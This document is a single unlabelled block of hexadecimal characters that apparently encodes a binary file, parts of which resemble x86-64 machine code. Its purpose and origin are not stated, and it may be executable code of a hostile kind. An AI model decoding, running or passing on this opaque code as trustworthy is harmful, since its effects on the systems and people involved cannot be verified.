9c6bdf9a0e88b63df14e348b3f3889b1b7199e0c141087bf131bbe34ac42d843cb16246e6aae28ee560860237e87b278f8b7bf90e9f04542bb7bcf1a2acbf2234be0807c7e5baff61e1f1b160c068802f3e5f800e88ba5ac9b938f7ea5b2e7221e19ac58d4c6814cf28547b827a757880c5cf37b186038988c54be0e6b5bae2e8c04f827df88133f261be1b6a6d6349cafc9b4dbc5a67c58515aa132498938043cdc78bc9991a7a068bb4579401b4d650b3a02348cb40834840c5883191e5443fdb38adad68b14465c871d9c382a0c9ed4cbc7f42c341cae8abae120014b310c80557a772ef1f1b8c61014a02cb791a974e754c8b4186c74a2af0f3d846592f00e0fe1e19d223f8e6969f009f611d50c78bcb87c74c8fc3862ca041d526e12dea2c8a9330112123d23ae6e581198f0f0f38c70cccd9390be3f0517914679ad92e7a6b57c3890283fb70097f6f5dc7abe2494475bb6166ee1ef70121cafa59c38bebee01eca22a610eb8b37cfb87e4e1406312b545cf9a8fdaa17b453ad17647a5751d0ccf678c2434382bc3f8154de00876ddbc007e7af902e0e97a4b70c5d8bde88b4023978000007b80c4b4d414f1ada0c3038a1270630cb9aa0599fd5dd8f80f8b58dc0f47c38b45a5632308ab030008f514252ce132f3a6ef19d55598cda5be1bad4ab61c20a3787288c83ff648004fb9782611ce3521313260c8fd65a9b9151588885d4cd7835712ebfc57a88e09900046992c0c08cfc72a6a4981d54dd6d25154710c39559ad75d2353a00783606481c2232c2c2445f959f59ccd67a9c9a2ec44c319aad8e2225bbbd6421165e0c434d0f111611a5329e162a268c5c0a500f53f19daef018bc5613a15b992797d2153d6b0b6834c6c816122eb03d2589b6e5441715dad6322a31856c1d15c2454fb488ac2d0435001c2f8b34b68bebc83e1036cc4a38e3b9ea2e3da3b0b38e13a43550100ff8b4323e086ccfe3c83f8e16e748042e1abc98301ed05eb0faaa6cf0709c5e87ce84700ff0066065bf3c78b2703bb9b92f2e8e0c46e031f1bada4c7819ab13955ada95a1cb8e275309dcffdd90768600f668341e2cb886cb8fa4914aa5bfc7b5df1b95aac863dabf5688d45b573c7c431dfaa81f0d8c9206752200519e3c76dc3ab61c5c8652246a4f03864c1c855594d8f4188dc76b6aa0b00d42a07a6ef4be4e020ae9110b895e0a278480d9ee3646cc0ccc3096e8a87d9f4def5039bb5f1177ad276ee744cc3cfaf6a8081b4f0f43f47c8bbc8cc3d0d0707b86dea3f7a7137f3cce7a17829cbd0736358c38b0561395f020fb87e88c1aa62a3c018cc5eb352222e3d4f58eff59ce4c4c646408dc24e45cf4a3eea514db982119fb3b8378609bf077ce8e269965c3b117833cfd454ccfc3f6eac6d0d82234612531c1b7d0ef3aa2fb5b4448b79ba2b9ab0c25bd19187df205af2bf0072a56f463c6c446297e84d9558c0c383b8b871906b0295019f7cd70bfbf50e6d73350e0e4255d7d2635aeb84c9c74a0141c8f5bc078387ca08ebe09b90c084cf414a468384c133f349b92240db891d90c8c4b1dc9c69c9b8e3c3443c28f0c939b8a7d7d9fae45570132c78612c7d77d2d116628d8c7054720a170fb7f2ada962e546fd69f4e0f2dae03cdc60c3c64df0b87bff24c2895d8e8fb3c111be50f2a9e9e9526f346d4b2c62781226874bccfb3cb3347ff1c59857c7361a1b29c9aa2e7034450356571615151414171722f3e7a6ee5f53cccfb918dd5a1ee00d8e2b514e499f91906047910e1dee2a49c055350f589788c1b372713939cafc703aa5a8c1a1558d84d4a3080b12423646e782157a15cfff5dbae422139dec4d5796b5655c0ccdc0ada576f36091a199f9f3e8e78ca7c7a8c35b94ac7a72de7acf7ba07b220833656e02d05ff8c7ee44a1c53095091099775fc3ab5595acc744fc32d79fcb09fb6b662d1863ed9603534cc773b1883efc4a49ff388fc5c54f4f89c1e9ea4a72cfbc474867ef86ca4d319e3c78694c8b995bc24d8eb73fc04179043e7782beb6fe3108faca444fcb81b6ffc08c77fab4aa93c5995d1d11f9a8190949c20b5198c24427da6d8ee6366316033dc799ecb4c78bfeb6c1dc8d90c349e7456058a8f57122e6ca32632a51d5c89d9dc68c4ac68beea7b63a867b0414085582bf63fb60b0484ba3f5051dc6464cb169aab621e100f77e491d98da3a057055d892c38d3d704ac6cd41ca44c7185d1d157673b489c1e471690c7416af89182bfa21505e19003781c2571dc62cf5ae61d1cd0fe92fc9d297cd5eaf603469c284e77bd3424ab7ffc78ac0f2774073c059d70555eb26974f3140511f038717eee143ea5a211e1e415e1f1c1c1d0301038d138676fa986011b28a687696bc11c2009f11bd842974b01927cfa6d2a36f7c2c7408c8827b3179f029c42f69aedc33a3ff3847bc05397582f623127962eb884bf9b2087bc38e54afcf82920e1c647418c3e748c4ee7afeaef443efac431047f4427a085c9f8ec0fd714d4f19ed6609ea730d9d5529996195ccc74680c64f8d489089d020c9b10080316c01674b95bdc581277b5111306d5d9b4c2fe08b824b02c3430626ec94b3a87318d7f7b767db236e63e5777946c3894456050d50cbc54e001c27ccff0e610f618a4c2eeb6a586d15cbe7400420b3a300d5ca2013fccf515f184b537ccd811141501010b1c34322a2c34d2c75d3c7c7a05460114cc60b70b8c37ab9f3ba70fa8a41cfc773eaa556a888022c0313115a7d42478f3e7e8847ac60b102345cd6262cb47bdbfe6673fdc675ab54808a79c34f751e56c5cb474973ebb0146158c645dc1b383c797d69038a6851f2a269c61c73bf7f79d45a7a8d84c5d2928584c93b709212a9fd9e09405019b73d83f929fe9976589556e4b36fd96aa5250626cf000ffd84f55833672dbcb6c79020a012194531f71dc7781b89e090cb7bd0d78a3f632e0690fb92b0d81378048b9727640cdcd927493645f54fbff48b50600eb0c814b8eca971914544e06003c2dd1d246cc2e56641622b2e66893cfe83fc58245c725b6699ce60795cd151a31e125b724778581c587a2a63f7e6373a579dd10c54c35d3e679fc303cd990ec2fbd0a834ea38edc9081111bcf4c28d4fc2dd56084063fb98893bf9430873d1e58be7f28a30bd43b54031ddf8748283f949e7966821fd3400e9ac94d022503fb63486c3fa0167eeb1483948797c7334f329eb88aa3526e89371206c7532bfde5b85c64fece0fe151c0fd169c18eefca6edc9048c38c07dca97205ba09277db417c1ce4f1858cb43e0507010fb2bf078631a79280bcba6f9006fef37893f7e89f987a717c70941c5a11a7ec35ecc1d0dd5baf6d3135c0988d57024e7f8130bfb20d54dc1db1d3fd4a8e4987010f0c8c89290c3751cc39aa8a922629bbf1646c0371f2582db0777f87009b0fd40c5c56804827992498b5290c2737381e2a206ac96e6206830fbd3cc9c607b80e3678f01a2a77da6a89c7a111e4791c3fb60920a9813830bdb548d9c7df38b3caa0d0b81565609819c430b5c849593a3f0e57dc1845ef1a36361730038c30ae06564711d0c7463e14abcf2fd1f10f2fd1e140524bf99028bcb48818d01262340abf42cf388c0018c151050d98c17121414e841cc9a0038c71616000000e89a4ac700df68c388bcbd023078c38b0885fa0936c30a098900199580a3f65a0248c80343d86c26d95cd7b0b00f1e100e1f58581f0f1158591f1f50602fa7b95061201e2e301e2e301eb4ea401e5e401e4e500f5f500f4d22600f6f284bcdce126278404bc5c615e5b8cb69ea0174c33c8a8889ea6b9d2ee193f9b9000180c0b9d5d30017f01f9771af793592908b8c8fbd6c59888dd7cb192e5a380fcb67ef444741084a0143367543d1f7e20cd65d03404fa8f35402834bc8ff0fffcec0827bf941356d50c3869f920941589d886637d4c873f3bc6415ed4d456ddade8c68640813998884e6910fff48488bd7781478c3ff50243870cb47e47f9c0fcc40131bcb6faccb52d933e19ac5c16804c8aa8e4cb9baa650ec194447037b058b67d5c263e6850481ce4effea8132a60000ebfe9678068861d3d3114a490dbeb50b805333eb1794780789675ac3cb04600cefc23475438c8b58548cfc581c38747c0444c30b97942209ab030000fd76488bcb47c4401b980f000084c1895c782c40c1e548345008c1fd503c4f1763036800c5d45939c84cfc272e488b408fcf4ef6e13af8477cd400bfd01df3724c08c1cf42bdbf07860e8d82a6e0e926b877a695b3ebe3c5b06907d3c3682bfe748e1b978b4bb7fec1d8f5ec7487bac5038b84edd6fb19d28e3db189a9e0b73e43027236862eac827f3d4404c0a4244485e2a3a25e5824184d1dc52188a479b88195d46d6c870780ce4b012f7a51182bf78cc10c8772b0df57c372b1c5d9542474dbc24dfbea6560b5a500bb7ad99d45cf0388b2f68b8aeb666854f88009fe3f805c27f8b187e59ace6072570d5a908244245450cbc9664bb9b642430eb97e23e6363bcbb87d854a0782480c7050df3e807af3be76eea6cb41c088888684c0b5af51cc4348c18c010c8fe740143044cf9fdf424997ed7ba22bc508a752307f0cfa81c88424c8f8330b2800c0c848404cd955b101304d490419d21c96494c37fa89483070c5c83565155b6bb18a23280222c8d49e8ca2804df9b840545c0346a129f5305b10050d030e42cc93530c67ec8bc1004cc64b6c0be487c51854e26bc58d4f56eff403757e8a80091951cbce4cef0ceb0dfbf400766490894b62e0c108ee6f092085cfff13c124e200a293f3c04ac80368ea74bd23d4fe91504f565dc9cfdddecc0dc060a37be16e7fe8e848cdcf62cbe74de0a00f9f51c885cfa26c84f73d836d6c93a1b58fc306af110033cc24dfaf6601b3c18998b865767ec2d04351c90bf05b69c268beddcecfe32c1b03011fc3676dde5f40ca78795231dfd5a3611db4ccad00567edd969bdb230b1f1ce18ac6a5e08373b40fd2d07a7b4444357234f32951f80ff69b0a2825cd87b2bc65dc904d645fab9453d9cead52be656303ca83c30b8199d859655fbc1a3427df4acb6937df4a05c66731bd2241c3cb60684889c861ab44ee325b589b583b2ce536ef7b7bb8bf8a50cda42ca54d0b81cd8feb60236b5f2300dda98b24787844e1ee30015e5d9e83c4728370edec729166995dada0c303fb72173ea59154a8f9ddc6a22d7863d9effffd2fba5769cec4a3ad0e83e2621d58addbe893c19ab1a52627f07601fd7e77fc017ef30c49d09174f5c00f4fe8a0c1ccb5bcc1c05d28b5ce464507b779cc44015207b569cca5a8c59d5d7dd8cdc48de78e77f1c34cacb25a474a40aace0c65818c654022ebd5c300fdfd9ee4066fc4a8bdd8e796d46f5a66a1b3b844fcc1c2eac7d1010039c327f2508203b1b1213b33ebe647e89a32ab618983405a730b8d8dd55702850d89125334675bcb3b2810b43420547d41c313f97ff598579dbc0502eaef4761b1d8448714fe6383c5747873261f25c7f0643d01cd5eaf5e086160208231a6f6c1c4ab01afc1813a3aa445f192f93ac92d21d3a7f0a28b0ec54a838e678b4ba345601455caac0efff0e48665805eae73eec042af855b530934293ad4f34e171960c382760116151517544320785908c38eaee7476b6bea6ecb25f74c32d7c5fb61c2547d737d45b5784449a54d474fe1e8d4fde36f4485a8a2a72f8465a7c283cc85febe340c01378ba61230014042ec6f69d9b383fdf8779e610a9f1a02ff00be7afcc8898b0c41430cb87830eaad18d47400c198a51cc1a01415cbb46b81861786d959804953de20e6c2e7da0076f27f4c4c8d3a526dc87d455804280789183ca64868026640384c500252447078b8f170755e25b9f7818e4e112aeba7613de94f8d7a7b40cc991387cc4c1f071c4542fcb6622bd7a286bbcb42c34240380944a598c5ce591ebd47be44848800414a03c78e62e4ba807ec05b1485684d14d3175bac83e9ed7055a26ae4797413527af4bb714dc383ce2dc992a14643150154bff2998046c7811090803520948107878024a48048c10a82232883f273e3e88afa730840c5f67703b871d56116b4b38a160ff63f0c4bbe5290020f8a34910595ae3acd1cc53149c565e6ddf72d3904f1884d56465cc1b83f1fb589946cef72c1915c40498822e7494ec882498b5a907909453400e0984a73754e2a4e5c431f5e447ffbb75361c8dd401140c07bbb2c1e6456418a8c4346c486494c643a025d46d4e3367496e1603e1f780a47b589ca83c1c9454ef4be62c47be1d9ac1652246b8a6e1dfd0f2aa96ceb70689f6c6f8d797a4f7ac48ad5afc7fd694fb0ac3a7eca81a0af43790fbb81a0af3a1ca9804c0265fbe93b18dacc00b62be2384b8db11f2cb8f34bf778e6ef8849c5c44b03192addfe35d905aa24267d1570c1c914a660d31508786450445d39306b235844151e1e1f6e711d03012d4586cb0f5045a3f476cb519b516171109bb9c2433704af3e20f1ef20b9b6d393c4f87e1b6c6f22bd738284f9294c3cd986b8b7045572e52de931f3602545b471bda83828bf3de897ac2b2a419ad33a29abbb97896526bfc86624fa8ca5b82ef54183c1dc74d7eaf77fed0ada298cde4b92e26ac78ec3ae7816c095d4b1760d6b9b23085b0162382e0e20664e5861174740319fea886df24776c5ea54c3885e0ddd6dadbd9622641909446854b8d068b7fdc200c034723383bec5cd74720ecb45c4e2e036a6e591a8c56875bfd882710232516049992fb2c748d354cf458ad491291be1d380802113fa36eaae2496e9e96a8b08ee4204c346e5c0d8e726e0e91883175b021c333a1823727130e0d38ae5aae2b493c7b982ea9411936363030840c37cbec27515e30b4ac2fb7ac5274678cae3003cc3f0b9999c8734ea518b53ac368dd7781423d5c760727328c3e7487c10985bf7584c691555306a6b2404afeab33c1a8287b4887d96dddf7fba5520e12968d3b6c75654e000b0b1f1eda2ada2a216856d2d921bc5c5c077e309bf9a3424336360645046aac78b1c9932b8cfd496276546885bd1637b50c5fd744cf7bf20e0c605dd8e18044c38b344279a5f2d00102b0669c7e377487270cce160857a8b2a1fcaebef8f3bc48b310dcbb8c5ee644bc9f01624c2f00e49e0ec46f4eaf27c1ac83d366aa8935bc5980c293a8983e1de77c34e8d8939f8064e8920e74e4b0f0ac4e2e4348058a28c8ec9413870b73a8db7398ee82340cb40cbf3c6131431c3c28a9bbc3c59c2e09b70f3ea6970fb53393c979664c1495f8e23130113cc0ed143bc97589d80a5262ef7dc484097f7dc3c04e4e3071bdd895093c86bc8b4b46b73f977f68989cb73b86960d95f4f86857bb90a44ff3d1b12876a7900137af8b84dd5717ac1e7b54c946105bc1b549660ffea093c2d4589f3304ac8eb92f8777d43c33b7837eaebce2551752ccd71a148c1fa5bab7afb777704d6d545abc5ad7afa47315c89a008e3c8220049d05f846bf89a5a6e7b4bfefb4aa0852f42c28f02c187421a7960fe388eca45cec8437cfc0c8ab01527b6859e9a716019c9d160401f3fd1d1a9bbf2e099899eaee8ec0473f3b3e8e8fa2127e4dae786e579e41e96169e350dd450e7b22221371522880aa2e6ae4a30acf4d831a9bac446b00d8535bc0cec731e3773cda5e9bd7ee2d30b344ccb0bac1f3b627a997afb506bc78eab19f8c8d9b9a233c93af1b2df65ebd8ce49343b0940b173f1ca7571b4b1eab714c38bd991c3a063cd6899760dcfdfe0ea78cfa20010ef2a5144209bf840d3306873e5ab95a04074a0f46873e4ab59bd96feb04883f883f874615dc3873f7bb8b6d6e1bf31ea2d136b432318ee5626b610666e4088fbfcb2a2e5f2d4052effe1563a6d68c37a41b87c526608c5d7a2b0c32badf279f24435b5c29645a1003035e735e032c3b3abcc17242f4f00c2b0e5e43c42c5c56804a2901249c2727281e273459abb004f369bca9304b239daa09d1f2e46fbea029b183b7b84e73901d155d50596e27fc704c7574cda6290d81070004dc0c65b5dc0ce4b29b02cf4c4de4b6870400969adc643e067fe6f9d47d773f0e0e09df489427ac18467909963fb9863fc9c6071251c20e34f974194d34794763c894533dea965497058f676c141c83c90a4208c8c870f278b0a0c8204148069ff020b8be762097c60977af90b7f7b8c7af67b057985ccaabbc1e71f82af44e86b5428a5e7bdffb3c763a0cd45b575088b4b3716cb2002000048c38340c39ee0f7eae8488923e64c4bd2d1ebe230407d707f43488342d15873f1bf87f233fafaf388cd4cc60b9155c0d8cafa67daaaffff38c716160000e8e85870d700145cffc58d59514872c4b6c83cb020a4802ac1d4bc6aeb027447b06aed70679083e9e07d54a36aef727412917af8757037e8dbebc96ac5900c9e8daaa8ebf21908080109181008020d06090f0708ee688c022068cb2780bc9848484000c472827fb2ba030ae248aad722006f910e1817abab410241028b414962e13f777b205b9b19864c8b7111e84fc7b07249837cfe0e9b54480c8020ac8832b644cf8a3afe41074ac87a8a6d193830c981ccc24cebfd15484b2a291739d100befdac19090000837cf47c3701410fac5f8f4973c2ce551840c10d06bd77c1cd04641479cae66d081018087523be5a672a0074bf7450908e9e10ab2b0e2ec8aadd9f09ce87509c0c878483fff77d477ac38eb13665e6a544e44d4a4645adf959a0af05e6612b6349a60f284873fab54579cbe3224a0873b3d0fb00eb671570404267a54163df86f94989a308e34836651b807bf3028ac18ae8ed85d3d1de5d0809580f8823007f3cf94773718028682b8ae0bd221aecfc14450dc35391c289cdcf29ce799e00ff2dd28bd8439b448ebe28734ffa93880fd4508bda528641c4bdff41be81f5c308b8724181cc4d8993be44211ddd093ab6a8667b7158fb709b48cb478c091e1e1c5d411d030105980f00dede8c58a5fc80a1287b260544d98f0281e3b11982c4095712484ac58e8430bd8505c38bc1d5782c5f1fc8036fcc68c39696cb4c0c48c3727240837b2e1f1d1a08c683cd5eae710433f32be546c34034fb113a6f6860c344302cf368c3d77814f0dd3d7f4ed3d1906fc468e0d56cf1ec1641559944feda00b74b03b1f14921eb8fc74af273929ac3869b1e494e4bc42860b7da6ede950001c0eba3985dc5c849454d8545b4774ac0995808cb4a020f8c1393e4143041ca5394c7498ac38bd199c5c16804c83bd1fd3fd3985b91f0b045c40b48f0fa21d30af0d63be8f4707ceed9a860c84e7621db0ac8f8c9fccd43c34fcc40c1d15892fa7858c189706850c1f158611717c19c4c1576c5bfc95f54add4f242c2cb3f6792a42b4a54280a4753e6f74370627e5ccdb8b1ff7f3f5f28c38b6c484c20c3ff50545068c3f7585c38796911c9d69d8a0a681bd829807e3f8bcf601c747589883801010075605dcd7aff747209b9b060ef8e2599bb0404e94de4d39cb9b60e46c5d9701cd0b949021a008287c5811019c38b4c681c7ccfc2414c443bf0b5516e7ad2957c2aa1c24581de5b49854f4d06c844c74dc639395c5c2860c1f55804dfea09cc46f63a3b6706808f472b6341494073d39a487e44384e777540bfd2514cafd6dee542cf408844bda79dea6ae2e52635968a83c34414e7ea9d68e8484806e6a3ebf1ae007c480b48a24a7494c47c4c506c3c788d930220b32209489d807648e3c91e0901009f4bc259b3e3e0e2aa00c1fd503c7e6a48cde955740b2a29c27392224928f0d9295c762a48492ac2e13022f329666feaaba08183808af6b6c879b875357f0965fb3c84af007d399ab61e91f074bf43f7a75921c31f76be1d0100a8e46048647878565e00cb3bf9c0ab2a750c76b8744a30bbfddf2a6c5dfab73c02589573826693ac2041c789c546cf8026b040e700f3e49ff68aeaf8909198fc540c7c5823395a663c56c1895878a4964d4b59c2f8336069c268bc9ce228029ab129068b0d098b838e660171642192c482b6dca6ce13f4405c78c1d36a30085e361074c16ef358a8e23230cc8df83885644a19e1f214f4f47636b5f5cd6d9400c0fb225dc7ff3c47088aef6b55d185dbaf768b8a30e832cb4ac8a1feea7beee2e17bc84a758ac8cf812d3797997e4939b4e28fe4066252d2e4515502dd0016c5ad84866fae7ab98e2f20e8852c73b193d4fcfb8bac9667fd92615b468246816326c6b299e888975d597a119264769241ab8e85ada48b0233e8643e3dad316344bfb820f239ee3e3bc7c8438b8f2bab72a81aa9b1150d8884ec1734cbff00ccfa81c18c078724a050f1a1497124eb169d59515aecc739dc60fef4445b7c3df020ddd802eacf042617deac61747004126639c7cbb3bbc5b82e5f04c5088929d17c4981c5c07d756513f37a1aaf8f5aadadd388c145997ce54dc598585f9624a48f40eabd5d20e70649c0a52a4ec3488b5cd53938c00464e7cb442029e104e64acb7afb75714283c10623dcb7b71fc2e7c55811ca45ce40cb4546d810cb6cee74eb1df93a7078c3e7481cb9fb3a73b2fbba8c88e4a0fa9972b1c82c9574e5cf331a26002262d91b991a119b8707e336fe221715cbc0e8e202e3ed3dcfea31b106d332f140834cf7e31c71a411c5e96b8502e82cfff1aa7794a6fabf61e12b9798e440f756c4a501fcbde5c949e16548fab3ecc4c02b63a5092925c0d7949952c39aa8b5f3f8878565319029dc7c4c27e2208b6930f3038b1eef990000200f3f5dafb27174493abea9395871011a3b2180c8884554a5615df15ae3d0bd590ffaf13206e4e0d0c2f8d933f7255161e38249c80e874930aea3ae10151517d4c3304c4dfb17b89cd863034576d7acc371becc8228031bead00149c37a7485db93c5c58085c67af04114154e479434539b20ff0072ce48432bb3d04873d19d61fe1bbf64d700be314614b2bb90a42aa5bb90b98c88555e2b2b780272355fa7f83548c64582c549a440640cc74e25aada8913dd06a1c062d4c88accecc88814207c8cd571b491c607a4008f5328c53d4cccafcefb70b2d0badfe780cd27006a8c6e779245cf8bcd1951119a06a8e4b071f72fc31ad25262026042b2f8089054cce863eac49db1175ed99ccdc101e0f214727206c6c12a65b73883ce98aeae11be427f9859cb4d4fc9fb8ac1f2db91f28d21067567f38f646b64f463696bb17f49736f5ecc9ff7e30348c38d4f6ae08bbf77589053f66c641bce348e616b8534a1914dc77ca7500101767340cdaecdff5c488bcf607c10c30370f9d1d54dc38a8b8249c9088e42c99b11890c8a0121654ab8758b9dcf140f10955ea5505e7544cb42c0416ae210d4d63b8e274103c1a4e57bc14f7583e665c14a8ff8346ba505498828ed6227c243c0fc85b7a823c045b87a46793e807bf07e5967488dc2b0758b2d6aeeacdbaad5b30259b73622ebf0b972f5ba67998b013c054c728742f8b28811fae2f73e4889eafb13fdbfbe4fb7105bc79bd382cb5842106815ef1ba9b516f8c822547d1e6f490f4bbabfb729c5dac024c4e474f88f4fc30b8e468928ddb56083492b2be6b572cc81462a6b08cb44c5e9e09b902d1ca09148bf2e4982d29a12c985fd1108f16d4f7bf077cff7a4b0463e5fe46868d71ea1893b9a64c68a48c129d7774bd391cc8900167265fa388f21abc61ce44db6cf8172c38d7704162e5a185266f0b38b5774d34d37dd7422821f1fd261b383c0ffbc68a95e984c4b858509765763f074ab0165031314054a6a142d1c0f63a934a6534243c842880f4bccef6640ca577ce47c5c404cebe734d4e0e5e00514fb488ac2d01b24606f43e8a45479c2f0431b236545bac41f1dadc479c78bdc95c0d25341c0e2cbb059c0fa6b795465d1ac6ca058f0c27b7b274e41ee0dcdceaba0c38259667f4989ca8b45d854e914ae7193f78e85ac70d0705424402d69c9c84449c35dd60f9b55f2f34568e20f9f5f8863fb9863fad148cb7d01b7474b921701ca424bcc27ee565363517145c3c107ebd65c67a64111d460cf4e81d4a00195b41407a20e7fe5fa87c5c960643abca6d5b5c272e068b93f1e9717c40cf058434bc3ab524363d60b3f3347940faefdf36bb492f0021063f3892abb48b76265aa73b1c361aad59a404fc34043c941d0d0737b90a759c60caccfebc056e15bed6ede1ba03345a8d82051d9e9d04647d8897d7ed447fa2b6f4db6b611674601e151bd2e3d229b5622bc5fd452a3fdcb01918f135519352cb6ffc082c2bc3e027583f5630babc0484bc922c9220251deb01365c35ca27216b09fb3da56c1ed3691c8a2e1898a4ab72fb3837b62c170c08239f3d7127bde26be3be05427875f4bd9924bdad14063d0fbb2facb7e02ef58c5993befd7c23d07c7eb3c00cf77c2e4ffd6c58d4b4947c17b8b77c5c603460dc3cd4e88b83830442313cfcd424541836be9787e46b62fd8c685422c6cc27b9c647c67a3a79a6eba1041f71f293bff8e49034168f71cd3d05351022bc3ac47c3c002080a02a38b280019fbba5e0601b39929024644434b0c873fdebcdc776194803909457a47c5dc5085c5f9d85535e8d93332238be4586cea2dcf5e9d23625e1965781d9791e740042020bd9499e645e1d2b6dc70e50068283e3407a2622634cf2452f97fdd5af87f1eca731024dc134301cac54afb36d986e6f080746d22f4ba60a5a8106baa88336bd9884bc0f356a1c305019262f075730acac5f3a585a8b631bec2e31e7a047f5bc4492a991910939a4b4b97c64b2efd3b9f7701fe0039c53378b7bf8328ec4e2a25960a02d8857a810234c5e66ac4eb2d884b090425ad551302545f22221617dad88c4cb03b43f3fb7c7d834a362fe3bb47ba798f720e283f59b91b53b73946bc122e007582bf2bac83c1cb4601494bce85c35e3d6878f8ff00b32fa4b52d3f28c34625e0f89474143c45f99034a490d5ea0b0f2e33422c28feae14f2be4cf241478400c40bb303cc3526dd1d12bbcaabe87376457eced01f34b7bce8a0c30fa0a48000000048c379791fb0ac890190d9c0ca8b20e82020000044cfff5060082cedc1686404449091695b33c94aff58646d65c38bd5da9b5580be3186482bfa99cb7e02b7c58d1c2d79474b919dc38bcb23ef181f00854540f47ccec006e971989a9a8bcf6060bb378c7f3bf0ff935d427b0480744d7ebf86c8b741b84dc9747886894bb73c47c480b5827fcbbdff8829a707313b7b716a22c1cd600c2848c345088260042181683326020014a9472eeac11e5ace06a8b4903636212206a3a7300970c5c960643979330331034240c1c08f8e4b6b20e853400400b7c3d75c244428c3e7484c204901730338cb4794111f5ec30f8c151dc5e1480491f9c96d2c42ab2ce6e3323002487bf78cc189457a72c65adeb974c248cb43c449c643844c3beba36d5f87c60004bcb40e165972777bffcce885168501b7c945c5809c409e4756a67a474dfb3ec1123f64b6358b41c6c701f6ab2237c58d157d93fb004cc188076765034bc1dc8a97c5d9514b4d06e267b28d3f81c657d8c5883a3d0b4c8acf079d4dd7073b3f0407b5b0444206afa58f8a4c45061a1f054e48060f25afa82f878126aadcaeff1bd285c5ccaaa7894162e0f5265262e3020646b77c4a894bc1c20413168181367bc7cf817af748834b37b7b73f81c1a01c3c007583b6753a9897c08576f34444814e0f94548447c288c24249cc4fc18bc2599c0f4a0be8603740007a45cf078c8ff47fd0d3e7400430104576fa09cb38e1e133c9214fb1e9003300cccc84c1d5782c40c1896c483458c1fd503c18571615151414171741571fcb6f8c2dc662ed4dc28b9d6fbec772b1488557a76df0a60dbcf7f744add690d991f0fe1701109b482a37df0100024f4d9172aec84cbdaafe6cc72f809470c74ac8056490a55a17b89c78c2028378ba357980cef8bb837bfa74734077c4f6ebe842f7b749c337b820ecc80747b631cf7d653ac2d5c874ab5e5568498b9c5bc74685892bea3f73c74d4662e3454488fc5004ab4320f931de0100169af39a5289c1efeb8764e6824ccd42c368aa4e8bada98487a3cbef0b8b63e61bf1ea097c2cdb8301169468f132278b89c8c3cd0ac7fdfad5a0487de372d0034ecd981897a7700cc74e451a998c595fc93c581c71c2448e5d2c2111072f64c5c90ca4889ca15d1ee43acc0c33320b460ceafad0c9c2843cf34b58126be01a94d64adb887e699d63a680e07055c79663fa097cfca125947dad60a447c04665615e7fa3cd2660939c584817989f02a2e5cc0f163f6ccf4883505342d2133c322663711a8919a36ca7b6b6be51f7073028180909474df90b00b3c12dcf2609cbd06b79c2e04b0457734009c268a21e1e1f1e011c1c1d039ca229c38b0d64462d0233f38848834ac8497134295fff8602005291488e27022101c30f3c0fbe5158c3070d61a15d3c6546f30f5fb94dd5713bcae923ca0180b77fc9048088cc7979f9be0705149d98ba9f501c4569a050d47f43c39bb0f226b4c909024acbfb90e874781c58c3dba8bf45c2e06949836be974be83c302fb5280a9e090f980eeb3bdbc7c054573eb798a8052f82f7731589d80bf84b68c37fab5647d25c30846d377e2bb7840752914c3008814dec9746295ba397564f9fc963ebd951faa29e0f61d2eac3238e87a3f2264482c0c0c577126858be2a0a0ea3e5e6382ce88db59c68c2d872c8388965e00c968171ef3fbf0fbe61595c542bd7d02ebe427ec6761647ed9c5c4c1f44e3993d0c9e0cecf8a62607ef74d44fa963e9902e8c4b9be2a52fb2eab6763c1f67e717eb7846e5260a3844748786a737b17e5ca8cec4509e64e47e183fc5e414b385bc3c42f4be2bd56282b2501ed64ae21c5ce0848cb44e768cb6eec4d39c4b1ca2b558478a8548cbd6455f4a054947fb68b42254eab6c0c8b175cdfe79901ff242bd8bc64a8f85111f0ff07c940dd5c01fe3f037b291114ebbc0f4d912063f1900ab5884eca84a592d2e5129c0a83078045b578e5602a8ea44323e06a72d4e47bdbd08534e71cfaeb13fcef054ee503ad4d8e6daeebf0936fc448650a0b8012b60263c24a360f58ec4548e0fa5704020a28623dba96b6e4e4b6b6e42410d6e2287d5953700a70b4b1737615450e49175992da1130666630b464e636bcdd77f7addceceb2150131190c81df7bcdf5bc27386192036b2b0850d2078dfae8fb61af654a55eae438f891525e8e8a2673a006fd8c5028ef286603a406d02e8ce8fc87e9453db01d7d5024ab8f25256eee3af14ef17f9f419d0a8146248e2fe4ec371cb05364b5804510cc39251733bdaaf704dc34929d23948c19859c34122c57e73712174705603a5282cd9daa35b6b107561d4d7bc80a2e852ebac84e3d8237af36372fb4c2ce97231b18b0e7383bdf1c68b35a2202ddedd96c24918507336556b3102205471eddd8c08bf456b7545114f5d12223012293811451146121002123120113b2912fe5e61e36bc3c0732811312312ab47fe12415011273512dac812abe258111d0f12c8da12697811ab803912b6a412716011213312ab0fb612796811170512928113a32979c50c36044a427f3d4263ea69f72d36f19ce838bc65cae042f3ea2336e2ac42551540ab29b41c4d11671949463f6a51507c8ca1484318112e3c121d4946121100112436120b191259fdb5115a4812f94f75d17370113b6b4212e7f710d3d4720a0a502e1a526716f3498dd599c38ff4b8580833dab9cb45c6074f892fed4b73f3c8484748b0bfcd738234545cc380e34e57f2fcba65aed5fba8f68b99e83a4ab8e81c6b70514f328b55984d0223a504d287ea86baa585fe52035d3d69b01ca0c67398a00274d6a08df8708e5d9ee82dc63b9880ea838a9a6829db5d3eb289d330d0a0cd9d45ae13a3aae18b00cbc969e0e8f77e698300c3f9b12a39a0b350e1b107b6b18d065db6d0b0c0c51c1a079c4bd342cd0705065b01d1d63e159d4a82e0c5063bd363a0a6e93cd350c0920200a1a7e601e18bcfcf2b40e0e85c0287259f210219b1a81bb3b001b19c2fb37ac209b19022b2a19291ecbee54b46db8315cc0ae2d89978c1895d3d28c1fc1d20c1ab5f4d4b7e436ee8f102f6c548c1cc6564cf61af4421b51e5a9cc66ba8c58d4d4de846a3f2007489b754c2a67383724fc30bc54d83fb7cfb6a3c822345ce4482c64f4f458a5fc9c28cb428483aee1f83e2eaf73d3deae68d77c969ca93b0115634cc166b73e1075ec275b64bb3ad1f4dcfa2dbb153db88cda5e1b5013dc56be623e2c940753d2149e5ca5767773a7273c3b053d2814823eb80c5cc4e4773fb01b67d42f048a0443420000f47cb63101842e047dd8a711b3acbcf8b5eaf0d79c7c4cf00cc00ebf74dc795eb2b76b412cb49e27d1ed7c7dd00dd038040d315556fe4ea730a04c74cf4719053c3adefff004fbc48091df68e280decc3029a7ad91960eb4531ea3faa8cccbe641244c7060cb471cf4b88488b5892ca4632ea8d38db7b008b7318e4fb1ee526336153d371b86857737001ece0a8a787fd651874558120c545832331c0ac768bc78fc3c66d687b